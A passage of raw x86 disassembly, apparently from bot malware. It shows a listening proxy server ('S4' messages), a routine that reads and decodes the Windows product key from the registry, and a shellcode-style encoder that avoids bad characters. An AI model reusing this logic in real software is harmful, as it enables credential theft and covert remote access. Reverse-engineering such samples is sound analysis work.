var_23		= byte ptr -23h
var_14		= dword	ptr -14h
var_C		= byte ptr -0Ch
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_10		= byte ptr  18h
arg_20		= byte ptr  28h
arg_120		= dword	ptr  128h
arg_12C		= byte ptr  134h
arg_13C		= dword	ptr  144h
arg_144		= dword	ptr  14Ch
arg_14C		= dword	ptr  154h

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		push	0FFFFFFFFh
		push	offset loc_41CE51
		mov	eax, large fs:0
		push	eax
		sub	esp, 14Ch
		mov	eax, dword_424064
		xor	eax, esp
		mov	[esp+158h+var_14], eax
		push	esi
		push	edi
		mov	eax, dword_424064
		xor	eax, esp
		push	eax
		lea	eax, [esp+164h+var_C]
		mov	large fs:0, eax
		mov	esi, [ebp+arg_0]
		mov	[esp+164h+var_24], 0
		xor	eax, eax
		lea	edi, [esp+164h+var_23]
		stosd
		stosd
		stosd
		push	41h
		pop	ecx
		stosw
		push	6
		stosb
		push	1
		lea	edi, [esp+16Ch+var_130]
		push	2
		rep movsd
		call	ds:dword_41E220	; socket
		push	[esp+0Ch+arg_120]
		mov	dword_429608, eax
		mov	word ptr [esp+10h+arg_0], 2
		call	ds:dword_41E270	; htons
		and	[esp+0Ch+arg_4], 0
		mov	word ptr [esp+0Ch+arg_0+2], ax
		push	10h
		lea	eax, [esp+10h+arg_0]
		push	eax
		push	dword_429608
		call	ds:dword_41E27C	; bind
		test	eax, eax
		jge	short loc_414861
		push	offset aS4BindError ; "S4: bind() Error"
		jmp	short loc_414878
; ---------------------------------------------------------------------------

loc_414861:				; CODE XREF: sub_4147B2+A6j
		push	0Ah
		push	dword_429608
		call	ds:dword_41E230	; listen
		test	eax, eax
		jge	short loc_4148C5
		push	offset aS4ListenError ;	"S4: listen() Error"

loc_414878:				; CODE XREF: sub_4147B2+ADj
		lea	eax, [esp+10h+arg_20]
		push	eax
		push	[esp+14h+arg_120+2]
		push	offset dword_4294DC
		call	sub_417FE1
		add	esp, 10h
		call	ds:dword_41E0DC	; GetCurrentThreadId
		push	eax
		call	sub_414CA5
		pop	ecx
		xor	eax, eax
		mov	ecx, [esp+0Ch+arg_144]
		mov	large fs:0, ecx
		pop	ecx
		pop	edi
		pop	esi
		mov	ecx, [esp+arg_13C]
		xor	ecx, esp
		call	sub_402C9E
		mov	esp, ebp
		pop	ebp
		retn	4
; ---------------------------------------------------------------------------

loc_4148C5:				; CODE XREF: sub_4147B2+BFj
		push	dword_4294DC
		lea	esi, [esp+10h+arg_12C]
		call	sub_419C46
		movsx	eax, word ptr [esp+10h+arg_120]
		pop	ecx
		push	eax
		mov	eax, esi
		push	eax
		push	offset aS4SI	; "S4: %s:%i"
		lea	eax, [esp+18h+arg_20]
		push	eax
		push	[esp+1Ch+arg_120+2]
		push	offset dword_4294DC
		call	sub_417FE1
		add	esp, 18h
		xor	eax, eax
		mov	edi, esi
		stosd
		stosd
		stosd
		stosd

loc_41490A:				; CODE XREF: sub_4147B2+1A0j
		push	0
		lea	eax, [esp+10h+arg_10]
		push	eax
		push	dword_429608
		call	ds:dword_41E234	; accept
		push	8
		mov	edi, eax
		call	sub_4035D9
		mov	esi, eax
		pop	ecx
		mov	[esp+10h], esi
		and	[esp+0Ch+arg_14C], 0
		test	esi, esi
		jz	short loc_41494A
		mov	ecx, edi
		push	offset sub_41463A
		mov	edi, offset aSc	; "SC"
		call	sub_414D0E

loc_41494A:				; CODE XREF: sub_4147B2+185j
		or	[esp+0Ch+arg_14C], 0FFFFFFFFh
		jmp	short loc_41490A
sub_4147B2	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=10Ch


sub_414954	proc near		; CODE XREF: sub_401E90+38p

var_18C		= dword	ptr -18Ch
var_188		= dword	ptr -188h
var_184		= dword	ptr -184h
var_180		= dword	ptr -180h
var_17C		= dword	ptr -17Ch
var_178		= dword	ptr -178h
var_174		= dword	ptr -174h
var_170		= dword	ptr -170h
var_16C		= dword	ptr -16Ch
var_168		= dword	ptr -168h
var_164		= dword	ptr -164h
var_160		= dword	ptr -160h
var_15C		= dword	ptr -15Ch
var_158		= dword	ptr -158h
var_154		= dword	ptr -154h
var_150		= dword	ptr -150h
var_14C		= dword	ptr -14Ch
var_148		= dword	ptr -148h
var_144		= dword	ptr -144h
var_140		= dword	ptr -140h
var_13C		= dword	ptr -13Ch
var_138		= dword	ptr -138h
var_134		= dword	ptr -134h
var_130		= dword	ptr -130h
var_12C		= dword	ptr -12Ch
var_128		= dword	ptr -128h
var_124		= dword	ptr -124h
var_120		= dword	ptr -120h
var_11C		= dword	ptr -11Ch
var_118		= dword	ptr -118h
var_114		= byte ptr -114h
var_113		= byte ptr -113h
var_14		= byte ptr -14h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		lea	ebp, [esp-10Ch]
		sub	esp, 18Ch
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+10Ch+var_4], eax
		mov	eax, [ebp+10Ch+arg_0]
		push	ebx
		push	esi
		xor	ebx, ebx
		push	0FFh
		mov	[ebp+10Ch+var_128], eax
		lea	eax, [ebp+10Ch+var_113]
		push	ebx
		push	eax
		mov	[ebp+10Ch+var_114], bl
		call	sub_408130
		add	esp, 0Ch
		lea	eax, [ebp+10Ch+var_11C]
		push	eax
		push	0F003Fh
		push	ebx
		push	offset aSoftwareMicros ; "SOFTWARE\\MICROSOFT\\Windows NT\\CurrentVe"...
		push	80000002h
		mov	[ebp+10Ch+var_18C], offset aB_0	; "B"
		mov	[ebp+10Ch+var_188], offset aC_0	; "C"
		mov	[ebp+10Ch+var_184], offset aD ;	"D"
		mov	[ebp+10Ch+var_180], offset aF ;	"F"
		mov	[ebp+10Ch+var_17C], offset aG ;	"G"
		mov	[ebp+10Ch+var_178], offset asc_420770 ;	"H"
		mov	[ebp+10Ch+var_174], offset aJ ;	"J"
		mov	[ebp+10Ch+var_170], offset aK ;	"K"
		mov	[ebp+10Ch+var_16C], offset aM ;	"M"
		mov	[ebp+10Ch+var_168], offset aP ;	"P"
		mov	[ebp+10Ch+var_164], offset aQ ;	"Q"
		mov	[ebp+10Ch+var_160], offset aR ;	"R"
		mov	[ebp+10Ch+var_15C], offset aT ;	"T"
		mov	[ebp+10Ch+var_158], offset aV ;	"V"
		mov	[ebp+10Ch+var_154], offset aW_0	; "W"
		mov	[ebp+10Ch+var_150], offset asc_420798 ;	"X"
		mov	[ebp+10Ch+var_14C], offset aY ;	"Y"
		mov	[ebp+10Ch+var_148], offset a2 ;	"2"
		mov	[ebp+10Ch+var_144], offset a3 ;	"3"
		mov	[ebp+10Ch+var_140], offset a4 ;	"4"
		mov	[ebp+10Ch+var_13C], offset a6 ;	"6"
		mov	[ebp+10Ch+var_138], offset a7 ;	"7"
		mov	[ebp+10Ch+var_134], offset a8 ;	"8"
		mov	[ebp+10Ch+var_130], offset a9 ;	"9"
		mov	[ebp+10Ch+var_12C], ebx
		call	ds:off_41E02C
		test	eax, eax
		jnz	loc_414BBA
		mov	eax, 0A4h
		push	eax
		mov	[ebp+10Ch+var_124], eax
		call	sub_403C6E
		mov	esi, eax
		cmp	esi, ebx
		pop	ecx
		mov	[ebp+10Ch+var_120], esi
		jz	loc_414BBD
		push	[ebp+10Ch+var_124]
		push	ebx
		push	esi
		call	sub_408130
		add	esp, 0Ch
		lea	eax, [ebp+10Ch+var_124]
		push	eax
		push	esi
		push	ebx
		push	ebx
		push	offset aDigitalproduct ; "DigitalProductId"
		push	[ebp+10Ch+var_11C]
		call	ds:off_41E008
		test	eax, eax
		jnz	loc_414BBD
		push	edi
		add	esi, 34h
		lea	edi, [ebp+10Ch+var_14]
		movsd
		movsd
		movsd
		movsw
		lea	eax, [ebp+10Ch+var_14]
		movsb
		lea	ecx, [eax+1]

loc_414ABD:				; CODE XREF: sub_414954+16Ej
		mov	dl, [eax]
		inc	eax
		cmp	dl, bl
		jnz	short loc_414ABD
		sub	eax, ecx
		mov	[ebp+eax+10Ch+var_14], bl
		mov	[ebp+10Ch+var_118], 18h

loc_414AD4:				; CODE XREF: sub_414954+21Ej
		push	0Eh
		xor	edi, edi
		pop	esi

loc_414AD9:				; CODE XREF: sub_414954+1A1j
		lea	ecx, [ebp+esi+10Ch+var_14]
		movzx	edx, byte ptr [ecx]
		mov	eax, edi
		shl	eax, 8
		xor	eax, edx
		push	18h
		cdq
		pop	edi
		idiv	edi
		dec	esi
		mov	[ecx], al
		mov	edi, edx
		jns	short loc_414AD9
		lea	eax, [ebp+10Ch+var_114]
		push	eax
		call	sub_404330
		mov	eax, [ebp+edi*4+10Ch+var_18C]
		pop	ecx
		mov	edx, eax

loc_414B07:				; CODE XREF: sub_414954+1B8j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_414B07
		lea	edi, [ebp+10Ch+var_114]
		sub	eax, edx
		dec	edi

loc_414B14:				; CODE XREF: sub_414954+1C6j
		mov	cl, [edi+1]
		inc	edi
		cmp	cl, bl
		jnz	short loc_414B14
		mov	ecx, eax
		shr	ecx, 2
		mov	esi, edx
		rep movsd
		mov	ecx, eax
		lea	eax, [ebp+10Ch+var_114]
		and	ecx, 3
		push	eax
		rep movsb
		call	sub_404330
		mov	eax, [ebp+10Ch+var_118]
		pop	ecx
		push	5
		cdq
		pop	ecx
		idiv	ecx
		test	edx, edx
		jnz	short loc_414B6F
		cmp	[ebp+10Ch+var_118], ebx
		jz	short loc_414B6F
		lea	eax, [ebp+10Ch+var_114]
		push	eax
		call	sub_404330
		lea	edi, [ebp+10Ch+var_114]
		pop	ecx
		dec	edi

loc_414B56:				; CODE XREF: sub_414954+208j
		mov	al, [edi+1]
		inc	edi
		cmp	al, bl
		jnz	short loc_414B56
		lea	eax, [ebp+10Ch+var_114]
		mov	esi, offset asc_420800 ; "-"
		push	eax
		movsw
		call	sub_404330
		pop	ecx

loc_414B6F:				; CODE XREF: sub_414954+1EDj
					; sub_414954+1F2j
		dec	[ebp+10Ch+var_118]
		jns	loc_414AD4
		mov	esi, [ebp+10Ch+var_128]
		lea	eax, [ebp+10Ch+var_114]
		push	eax
		push	offset aS	; "%s"
		push	0FFh
		push	esi
		call	sub_40307C
		add	esp, 10h
		mov	eax, esi
		lea	ecx, [eax+1]
		pop	edi

loc_414B98:				; CODE XREF: sub_414954+249j
		mov	dl, [eax]
		inc	eax
		cmp	dl, bl
		jnz	short loc_414B98
		push	[ebp+10Ch+var_11C]
		sub	eax, ecx
		mov	[eax+esi], bl
		call	ds:off_41E010
		push	[ebp+10Ch+var_120]
		call	sub_403B91
		pop	ecx
		mov	eax, esi
		jmp	short loc_414BD3
; ---------------------------------------------------------------------------

loc_414BBA:				; CODE XREF: sub_414954+104j
		mov	esi, [ebp+10Ch+var_120]

loc_414BBD:				; CODE XREF: sub_414954+120j
					; sub_414954+14Aj
		push	[ebp+10Ch+var_11C]
		call	ds:off_41E010
		cmp	esi, ebx
		jz	short loc_414BD1
		push	esi
		call	sub_403B91
		pop	ecx

loc_414BD1:				; CODE XREF: sub_414954+274j
		xor	eax, eax

loc_414BD3:				; CODE XREF: sub_414954+264j
		mov	ecx, [ebp+10Ch+var_4]
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		add	ebp, 10Ch
		leave
		retn
sub_414954	endp

; ---------------------------------------------------------------------------
		cmp	dword ptr [eax+4], 0
		setnz	al
		retn

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_414BF2	proc near		; CODE XREF: sub_414C86+12p
					; sub_414CA5+5Dp

var_18		= byte ptr -18h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 18h
		and	dword ptr [ebx+4], 0
		mov	eax, dword_437E4C
		mov	eax, [eax]
		mov	[ebp+var_4], eax
		mov	eax, offset dword_437E48
		push	esi
		push	edi
		mov	[ebp+var_8], eax
		mov	[ebp+var_10], eax

loc_414C13:				; CODE XREF: sub_414BF2+4Cj
		mov	eax, dword_437E4C
		lea	edi, [ebp+var_10]
		lea	esi, [ebp+var_8]
		mov	[ebp+var_C], eax
		call	sub_40169D
		test	al, al
		jz	short loc_414C7B
		call	sub_40164F
		mov	ecx, [ebx]
		cmp	ecx, [eax+40h]
		lea	edi, [ebp+var_18]
		jz	short loc_414C40
		call	sub_40166F
		jmp	short loc_414C13
; ---------------------------------------------------------------------------

loc_414C40:				; CODE XREF: sub_414BF2+45j
		mov	eax, [ebp+var_8]
		mov	[ebp+var_10], eax
		mov	eax, [ebp+var_4]
		lea	esi, [ebp+var_10]
		mov	[ebp+var_C], eax
		call	sub_40166F
		mov	eax, [eax+4]
		cmp	eax, dword_437E4C
		jz	short loc_414C7B
		mov	ecx, [eax+4]
		mov	edx, [eax]
		mov	[ecx], edx
		mov	ecx, [eax]
		mov	edx, [eax+4]
		push	eax
		mov	[ecx+4], edx
		call	sub_4034FB
		dec	dword_437E50
		pop	ecx

loc_414C7B:				; CODE XREF: sub_414BF2+36j
					; sub_414BF2+6Bj
		push	ebx
		call	sub_4034FB
		pop	ecx
		pop	edi
		pop	esi
		leave
		retn
sub_414BF2	endp


; =============== S U B	R O U T	I N E =======================================



sub_414C86	proc near		; CODE XREF: sub_402086+77p
					; .text:00402A3Ep ...
		push	ebx
		mov	ebx, eax
		push	0
		push	dword ptr [ebx+4]
		call	ds:off_41E094
		test	eax, eax
		jz	short loc_414CA1
		call	sub_414BF2
		mov	al, 1
		pop	ebx
		retn
; ---------------------------------------------------------------------------

loc_414CA1:				; CODE XREF: sub_414C86+10j
		xor	al, al
		pop	ebx
		retn
sub_414C86	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_414CA5	proc near		; CODE XREF: sub_41463A+159p
					; sub_4147B2+E6p ...

var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= byte ptr -8
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 1Ch
		mov	eax, dword_437E4C
		mov	eax, [eax]
		push	ebx
		mov	[esp+20h+var_14], eax
		mov	eax, offset dword_437E48
		push	esi
		push	edi
		mov	[esp+28h+var_18], eax
		mov	[esp+28h+var_10], eax

loc_414CC9:				; CODE XREF: sub_414CA5+54j
		mov	eax, dword_437E4C
		lea	edi, [esp+28h+var_10]
		lea	esi, [esp+28h+var_18]
		mov	[esp+28h+var_C], eax
		call	sub_40169D
		test	al, al
		jz	short loc_414D07
		call	sub_40164F
		mov	ecx, [ebp+arg_0]
		cmp	ecx, [eax+40h]
		jz	short loc_414CFB
		lea	edi, [esp+28h+var_8]
		call	sub_40166F
		jmp	short loc_414CC9
; ---------------------------------------------------------------------------

loc_414CFB:				; CODE XREF: sub_414CA5+49j
		call	sub_40164F
		mov	ebx, [eax]
		call	sub_414BF2

loc_414D07:				; CODE XREF: sub_414CA5+3Cj
		pop	edi
		pop	esi
		pop	ebx
		mov	esp, ebp
		pop	ebp
		retn
sub_414CA5	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_414D0E	proc near		; CODE XREF: sub_40177B+246p
					; sub_4019F3+1F8p ...

var_50		= dword	ptr -50h
var_4C		= byte ptr -4Ch
var_4B		= byte ptr -4Bh
var_10		= dword	ptr -10h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 54h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	esi
		push	0
		push	ecx
		push	eax
		push	0
		push	0
		call	ds:off_41E090
		test	eax, eax
		mov	[esi+4], eax
		jz	short loc_414D67
		push	edi
		lea	eax, [ebp+var_4B]
		push	38h
		push	eax
		call	sub_40307C
		mov	eax, [esi]
		add	esp, 0Ch
		mov	[ebp+var_10], eax
		mov	eax, dword_437E4C
		push	eax
		mov	ecx, offset dword_437E48
		push	ecx
		lea	eax, [ebp+var_50]
		push	eax
		mov	[ebp+var_4C], 0
		mov	[ebp+var_50], esi
		call	sub_4016BA

loc_414D67:				; CODE XREF: sub_414D0E+27j
		push	1
		push	dword ptr [esi+4]
		call	ds:off_41E07C
		mov	ecx, [ebp+var_4]
		xor	ecx, ebp
		mov	eax, esi
		call	sub_402C9E
		leave
		retn	4
sub_414D0E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_414D82	proc near		; CODE XREF: sub_41B3E7+42Ap
					; sub_41B3E7+438p

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_2		= byte ptr -2
var_1		= byte ptr -1
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 0Ch
		cmp	[ebp+arg_0], 1
		push	ebx
		push	esi
		push	edi
		mov	[ebp+var_2], 1
		mov	[ebp+var_1], 0
		jnz	loc_414EA8
		mov	eax, [ebp+arg_4]
		lea	ecx, [eax+18h]
		and	eax, 80000001h
		mov	[ebp+arg_0], ecx
		jns	short loc_414DB2
		dec	eax
		or	eax, 0FFFFFFFEh
		inc	eax

loc_414DB2:				; CODE XREF: sub_414D82+29j
		jz	short loc_414DB8
		mov	[ebp+var_1], 1

loc_414DB8:				; CODE XREF: sub_414D82:loc_414DB2j
		mov	eax, 172h
		cmp	ecx, eax
		jle	short loc_414DCB
		cmp	[ebp+var_1], 1
		jnz	loc_414F9C

loc_414DCB:				; CODE XREF: sub_414D82+3Dj
		inc	ecx
		cmp	ecx, eax
		mov	[ebp+var_C], ecx
		jle	short loc_414DDD
		cmp	[ebp+var_1], 1
		jz	loc_414F9C

loc_414DDD:				; CODE XREF: sub_414D82+4Fj
		mov	ebx, offset byte_437CC8
		jmp	short loc_414DE9
; ---------------------------------------------------------------------------

loc_414DE4:				; CODE XREF: sub_414D82+F7j
		mov	eax, 172h

loc_414DE9:				; CODE XREF: sub_414D82+60j
		inc	[ebp+var_2]
		and	[ebp+var_8], 0
		push	eax
		push	0
		push	ebx
		call	sub_408130
		add	esp, 0Ch
		push	6
		pop	ecx
		mov	esi, offset dword_426A80
		mov	edi, ebx
		rep movsd
		mov	cl, [ebp+var_2]
		xor	edi, edi
		cmp	[ebp+arg_4], edi
		mov	byte_437CD6, cl
		mov	byte_437CDA, cl
		jle	short loc_414E38

loc_414E1E:				; CODE XREF: sub_414D82+B4j
		mov	esi, [ebp+var_8]
		mov	al, byte_437B50[esi]
		add	al, cl
		mov	byte_437CE0[esi], al
		inc	esi
		cmp	esi, [ebp+arg_4]
		mov	[ebp+var_8], esi
		jl	short loc_414E1E

loc_414E38:				; CODE XREF: sub_414D82+9Aj
		cmp	[ebp+var_1], 1
		jnz	short loc_414E47
		mov	eax, [ebp+var_8]
		mov	byte_437CE0[eax], cl

loc_414E47:				; CODE XREF: sub_414D82+BAj
		cmp	[ebp+arg_0], edi
		mov	al, 1
		jle	short loc_414E84

loc_414E4E:				; CODE XREF: sub_414D82+EEj
		mov	dl, byte_437CC8[edi]
		xor	esi, esi

loc_414E56:				; CODE XREF: sub_414D82+E0j
		cmp	dl, byte_4267F4[esi]
		jz	short loc_414E66
		inc	esi
		cmp	esi, 8
		jl	short loc_414E56
		jmp	short loc_414E68
; ---------------------------------------------------------------------------

loc_414E66:				; CODE XREF: sub_414D82+DAj
		xor	al, al

loc_414E68:				; CODE XREF: sub_414D82+E2j
		test	al, al
		jz	short loc_414E72
		inc	edi
		cmp	edi, [ebp+arg_0]
		jl	short loc_414E4E

loc_414E72:				; CODE XREF: sub_414D82+E8j
		cmp	al, 1
		jz	short loc_414E84
		cmp	cl, 0FFh
		jb	loc_414DE4
		jmp	loc_414F9C
; ---------------------------------------------------------------------------

loc_414E84:				; CODE XREF: sub_414D82+CAj
					; sub_414D82+F2j ...
		cmp	[ebp+var_1], 1
		jnz	short loc_414E93
		mov	eax, [ebp+var_C]
		inc	[ebp+arg_4]
		mov	[ebp+arg_0], eax

loc_414E93:				; CODE XREF: sub_414D82+106j
		mov	eax, [ebp+arg_4]
		cdq
		sub	eax, edx
		sar	eax, 1
		mov	byte_437CCB, al
		mov	eax, [ebp+arg_0]
		jmp	loc_414F9E
; ---------------------------------------------------------------------------

loc_414EA8:				; CODE XREF: sub_414D82+15j
		cmp	[ebp+arg_0], 2
		jnz	loc_414F9C
		mov	eax, [ebp+arg_4]
		lea	ecx, [eax+18h]
		and	eax, 80000001h
		mov	[ebp+arg_0], ecx
		jns	short loc_414EC7
		dec	eax
		or	eax, 0FFFFFFFEh
		inc	eax

loc_414EC7:				; CODE XREF: sub_414D82+13Ej
		jz	short loc_414ECD
		mov	[ebp+var_1], 1

loc_414ECD:				; CODE XREF: sub_414D82:loc_414EC7j
		mov	eax, 172h
		cmp	ecx, eax
		jle	short loc_414EE0
		cmp	[ebp+var_1], 1
		jnz	loc_414F9C

loc_414EE0:				; CODE XREF: sub_414D82+152j
		inc	ecx
		cmp	ecx, eax
		mov	[ebp+var_C], ecx
		jle	short loc_414EF2
		cmp	[ebp+var_1], 1
		jz	loc_414F9C

loc_414EF2:				; CODE XREF: sub_414D82+164j
		mov	ebx, offset byte_437CC8
		jmp	short loc_414EFE
; ---------------------------------------------------------------------------

loc_414EF9:				; CODE XREF: sub_414D82+214j
		mov	eax, 172h

loc_414EFE:				; CODE XREF: sub_414D82+175j
		inc	[ebp+var_2]
		and	[ebp+var_8], 0
		push	eax
		push	0
		push	ebx
		call	sub_408130
		add	esp, 0Ch
		push	6
		pop	ecx
		mov	esi, offset dword_426A9C
		mov	edi, ebx
		rep movsd
		mov	cl, [ebp+var_2]
		xor	edi, edi
		cmp	[ebp+arg_4], edi
		mov	byte_437CD6, cl
		mov	byte_437CDA, cl
		jle	short loc_414F4D

loc_414F33:				; CODE XREF: sub_414D82+1C9j
		mov	esi, [ebp+var_8]
		mov	al, byte_437B50[esi]
		xor	al, cl
		mov	byte_437CE0[esi], al
		inc	esi
		cmp	esi, [ebp+arg_4]
		mov	[ebp+var_8], esi
		jl	short loc_414F33

loc_414F4D:				; CODE XREF: sub_414D82+1AFj
		cmp	[ebp+var_1], 1
		jnz	short loc_414F5C
		mov	eax, [ebp+var_8]
		mov	byte_437CE0[eax], cl

loc_414F5C:				; CODE XREF: sub_414D82+1CFj
		cmp	[ebp+arg_0], edi
		mov	al, 1
		jle	loc_414E84

loc_414F67:				; CODE XREF: sub_414D82+207j
		mov	dl, byte_437CC8[edi]
		xor	esi, esi

loc_414F6F:				; CODE XREF: sub_414D82+1F9j
		cmp	dl, byte_4267F4[esi]
		jz	short loc_414F7F
		inc	esi
		cmp	esi, 8
		jl	short loc_414F6F
		jmp	short loc_414F81
; ---------------------------------------------------------------------------

loc_414F7F:				; CODE XREF: sub_414D82+1F3j
		xor	al, al

loc_414F81:				; CODE XREF: sub_414D82+1FBj
		test	al, al
		jz	short loc_414F8B
		inc	edi
		cmp	edi, [ebp+arg_0]
		jl	short loc_414F67

loc_414F8B:				; CODE XREF: sub_414D82+201j
		cmp	al, 1
		jz	loc_414E84
		cmp	cl, 0FFh
		jb	loc_414EF9

loc_414F9C:				; CODE XREF: sub_414D82+43j
					; sub_414D82+55j ...
		xor	eax, eax

loc_414F9E:				; CODE XREF: sub_414D82+121j
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_414D82	endp


; =============== S U B	R O U T	I N E =======================================



sub_414FA3	proc near		; CODE XREF: sub_41B3E7+417p

arg_0		= dword	ptr  4

		push	ebx
		push	ebp
		mov	ebp, [esp+8+arg_0]
		mov	eax, ebp
		lea	edx, [eax+1]

loc_414FAE:				; CODE XREF: sub_414FA3+10j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_414FAE
		sub	eax, edx
		lea	ebx, [eax+0CCh]
		cmp	ebx, 172h
		jg	short loc_41500C
		push	esi
		push	edi
		push	ebx
		push	0
		push	offset byte_437B50
		call	sub_408130
		add	esp, 0Ch
		push	32h
		pop	ecx
		mov	esi, offset dword_426AB8
		mov	edi, offset byte_437B50
		rep movsd
		movsw
		mov	eax, ebp
		movsb
		lea	esi, [eax+1]

loc_414FEE:				; CODE XREF: sub_414FA3+50j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_414FEE
		sub	eax, esi
		push	eax
		push	ebp
		push	offset word_437C1A
		call	sub_4081B0
		add	esp, 0Ch
		pop	edi
		mov	eax, ebx
		pop	esi
		jmp	short loc_41500E
; ---------------------------------------------------------------------------

loc_41500C:				; CODE XREF: sub_414FA3+20j
		xor	eax, eax

loc_41500E:				; CODE XREF: sub_414FA3+67j
		pop	ebp
		pop	ebx
		retn
sub_414FA3	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_415020	proc near		; CODE XREF: sub_41C177+64p
		xor	ecx, ecx
		push	esi
		push	edi
		mov	[eax+8], ecx
		mov	[eax+0Ch], ecx
		mov	[eax], ecx
		mov	[eax+4], ecx
		lea	edi, [eax+10h]
		mov	ecx, 10h
		mov	esi, offset byte_420FF8
		rep movsd
		pop	edi
		pop	esi
		retn
sub_415020	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_415050	proc near		; CODE XREF: sub_417760+BEp
					; sub_417760+13Bp ...

var_160		= dword	ptr -160h
var_15C		= dword	ptr -15Ch
var_158		= dword	ptr -158h
var_154		= dword	ptr -154h
var_150		= dword	ptr -150h
var_14C		= dword	ptr -14Ch
var_148		= dword	ptr -148h
var_144		= dword	ptr -144h
var_140		= dword	ptr -140h
var_13C		= dword	ptr -13Ch
var_138		= dword	ptr -138h
var_134		= dword	ptr -134h
var_130		= dword	ptr -130h
var_12C		= dword	ptr -12Ch
var_128		= dword	ptr -128h
var_124		= dword	ptr -124h
var_120		= dword	ptr -120h
var_11C		= dword	ptr -11Ch
var_118		= dword	ptr -118h
var_114		= dword	ptr -114h
var_110		= dword	ptr -110h
var_10C		= dword	ptr -10Ch
var_108		= dword	ptr -108h
var_104		= dword	ptr -104h
var_100		= dword	ptr -100h
var_FC		= dword	ptr -0FCh
var_F8		= dword	ptr -0F8h
var_F4		= dword	ptr -0F4h
var_F0		= dword	ptr -0F0h
var_EC		= dword	ptr -0ECh
var_E8		= dword	ptr -0E8h
var_E4		= dword	ptr -0E4h
var_E0		= dword	ptr -0E0h
var_DC		= dword	ptr -0DCh
var_D8		= dword	ptr -0D8h
var_D4		= dword	ptr -0D4h
var_D0		= dword	ptr -0D0h
var_CC		= dword	ptr -0CCh
var_C8		= dword	ptr -0C8h
var_C4		= dword	ptr -0C4h
var_C0		= dword	ptr -0C0h
var_BC		= dword	ptr -0BCh
var_B8		= dword	ptr -0B8h
var_B4		= dword	ptr -0B4h
var_B0		= dword	ptr -0B0h
var_AC		= dword	ptr -0ACh
var_A8		= dword	ptr -0A8h
var_A4		= dword	ptr -0A4h
var_A0		= dword	ptr -0A0h
var_9C		= dword	ptr -9Ch
var_98		= dword	ptr -98h
var_94		= dword	ptr -94h
var_90		= dword	ptr -90h
var_8C		= dword	ptr -8Ch
var_88		= dword	ptr -88h
var_84		= dword	ptr -84h
var_80		= dword	ptr -80h
var_7C		= dword	ptr -7Ch
var_78		= dword	ptr -78h
var_74		= dword	ptr -74h
var_70		= dword	ptr -70h
var_6C		= dword	ptr -6Ch
var_68		= dword	ptr -68h
var_64		= dword	ptr -64h
var_60		= dword	ptr -60h
var_5C		= dword	ptr -5Ch
var_58		= dword	ptr -58h
var_54		= dword	ptr -54h
var_50		= dword	ptr -50h
var_4C		= dword	ptr -4Ch
var_48		= dword	ptr -48h
var_44		= dword	ptr -44h
var_40		= dword	ptr -40h
var_3C		= dword	ptr -3Ch
var_38		= dword	ptr -38h
var_34		= dword	ptr -34h
var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4
arg_0		= dword	ptr  4

		sub	esp, 160h
		mov	eax, [esp+160h+arg_0]
		mov	edx, [eax+54h]
		push	ebx
		mov	[esp+164h+var_FC], edx
		mov	edx, [eax+5Ch]
		push	ebp
		push	esi
		mov	[esp+16Ch+var_10C], edx
		mov	edx, [eax+64h]
		push	edi
		lea	esi, [eax+10h]
		mov	[esp+170h+var_4], esi
		mov	ecx, 10h
		lea	edi, [esp+170h+var_158]
		rep movsd
		mov	ecx, [eax+50h]
		mov	[esp+170h+var_100], ecx
		mov	ecx, [eax+58h]
		mov	[esp+170h+var_110], ecx
		mov	ecx, [eax+60h]
		mov	[esp+170h+var_108], ecx
		mov	ecx, [eax+68h]
		mov	[esp+170h+var_104], edx
		mov	edx, [eax+6Ch]
		mov	[esp+170h+var_B8], ecx
		mov	ecx, [eax+70h]
		mov	[esp+170h+var_B4], edx
		mov	edx, [eax+74h]
		mov	[esp+170h+var_A8], ecx
		mov	ecx, [eax+78h]
		mov	[esp+170h+var_A4], edx
		mov	edx, [eax+7Ch]
		mov	[esp+170h+var_D0], ecx
		mov	ecx, [eax+80h]
		mov	[esp+170h+var_CC], edx
		mov	edx, [eax+84h]
		mov	esi, [eax+0C4h]
		mov	[esp+170h+var_D8], ecx
		mov	ecx, [eax+88h]
		mov	[esp+170h+var_D4], edx
		mov	edx, [eax+8Ch]
		mov	[esp+170h+var_118], ecx
		mov	ecx, [eax+90h]
		mov	[esp+170h+var_114], edx
